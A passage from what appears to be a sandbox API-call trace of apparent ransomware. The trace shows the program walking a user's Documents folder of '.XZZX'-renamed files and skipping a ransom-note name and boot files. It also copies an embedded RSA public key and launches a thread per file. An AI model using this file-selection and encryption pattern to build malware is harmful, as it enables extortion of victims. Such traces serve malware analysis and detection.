FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0102.091] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="Documents" [0102.091] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0102.091] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.091] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.091] lstrcmpW (lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpString2="..") returned 1 [0102.091] lstrcmpW (lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpString2=".") returned 1 [0102.091] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.091] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="ntldr") returned 0x0 [0102.091] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="NTLDR") returned 0x0 [0102.091] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0102.091] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="ntdetect.com") returned 0x0 [0102.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0102.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0102.091] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0102.091] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.091] lstrcpyW (in: lpString1=0x17cf1c, lpString2="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" | out: lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" [0102.091] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.091] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x334 [0102.092] WaitForSingleObject (hHandle=0x334, dwMilliseconds=0xffffffff) returned 0x0 [0102.093] Sleep (dwMilliseconds=0x96) [0102.248] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.248] lstrcmpW (lpString1="2FFB243E16646FF464F688111A91543C.XZZX", lpString2="..") returned 1 [0102.248] lstrcmpW (lpString1="2FFB243E16646FF464F688111A91543C.XZZX", lpString2=".") returned 1 [0102.248] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.248] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="ntldr") returned 0x0 [0102.248] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="NTLDR") returned 0x0 [0102.248] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0102.248] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0102.248] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0102.248] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0102.248] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0102.248] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.248] lstrcpyW (in: lpString1=0x17cf1c, lpString2="2FFB243E16646FF464F688111A91543C.XZZX" | out: lpString1="2FFB243E16646FF464F688111A91543C.XZZX") returned="2FFB243E16646FF464F688111A91543C.XZZX" [0102.248] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.248] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x338 [0102.249] Sleep (dwMilliseconds=0x96) [0102.404] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.404] lstrcmpW (lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpString2="..") returned 1 [0102.404] lstrcmpW (lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpString2=".") returned 1 [0102.404] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.404] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="ntldr") returned 0x0 [0102.404] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="NTLDR") returned 0x0 [0102.404] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0102.404] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0102.404] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0102.404] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0102.404] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0102.404] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.404] lstrcpyW (in: lpString1=0x17cf1c, lpString2="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" | out: lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" [0102.404] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.405] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x33c [0102.405] Sleep (dwMilliseconds=0x96) [0102.560] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.560] lstrcmpW (lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpString2="..") returned 1 [0102.560] lstrcmpW (lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpString2=".") returned 1 [0102.560] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.560] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="ntldr") returned 0x0 [0102.560] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="NTLDR") returned 0x0 [0102.560] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0102.560] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="ntdetect.com") returned 0x0 [0102.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0102.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0102.560] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0102.561] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.561] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4CA2A3B835A9C9D86061764339F6AE20.XZZX" | out: lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned="4CA2A3B835A9C9D86061764339F6AE20.XZZX" [0102.561] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.561] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x340 [0102.561] Sleep (dwMilliseconds=0x96) [0102.716] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.716] lstrcmpW (lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpString2="..") returned 1 [0102.716] lstrcmpW (lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpString2=".") returned 1 [0102.716] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.716] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="ntldr") returned 0x0 [0102.716] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="NTLDR") returned 0x0 [0102.716] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0102.716] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="ntdetect.com") returned 0x0 [0102.716] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0102.716] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0102.716] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0102.716] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.716] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" | out: lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" [0102.716] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.716] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x344 [0102.717] Sleep (dwMilliseconds=0x96) [0102.872] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.872] lstrcmpW (lpString1="5F3F59042CD153CCC290441930FE3814.XZZX", lpString2="..") returned 1 [0102.872] lstrcmpW (lpString1="5F3F59042CD153CCC290441930FE3814.XZZX", lpString2=".") returned 1 [0102.872] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.872] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="ntldr") returned 0x0 [0102.872] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="NTLDR") returned 0x0 [0102.872] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0102.872] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="ntdetect.com") returned 0x0 [0102.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0102.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0102.872] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0102.872] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.872] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5F3F59042CD153CCC290441930FE3814.XZZX" | out: lpString1="5F3F59042CD153CCC290441930FE3814.XZZX") returned="5F3F59042CD153CCC290441930FE3814.XZZX" [0102.872] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.872] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x348 [0102.872] Sleep (dwMilliseconds=0x96) [0103.028] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0103.028] lstrcmpW (lpString1="7E0556C23257A27A640F901F368486C2.XZZX", lpString2="..") returned 1 [0103.028] lstrcmpW (lpString1="7E0556C23257A27A640F901F368486C2.XZZX", lpString2=".") returned 1 [0103.028] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0103.028] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="ntldr") returned 0x0 [0103.028] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="NTLDR") returned 0x0 [0103.028] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0103.028] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0103.028] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0103.028] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0103.028] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0103.028] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.028] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7E0556C23257A27A640F901F368486C2.XZZX" | out: lpString1="7E0556C23257A27A640F901F368486C2.XZZX") returned="7E0556C23257A27A640F901F368486C2.XZZX" [0103.028] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.028] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x34c [0103.029] Sleep (dwMilliseconds=0x96) [0103.184] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0103.184] lstrcmpW (lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpString2="..") returned 1 [0103.184] lstrcmpW (lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpString2=".") returned 1 [0103.184] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0103.184] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="ntldr") returned 0x0 [0103.184] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="NTLDR") returned 0x0 [0103.184] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0103.184] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0103.184] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0103.184] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0103.184] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0103.184] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN 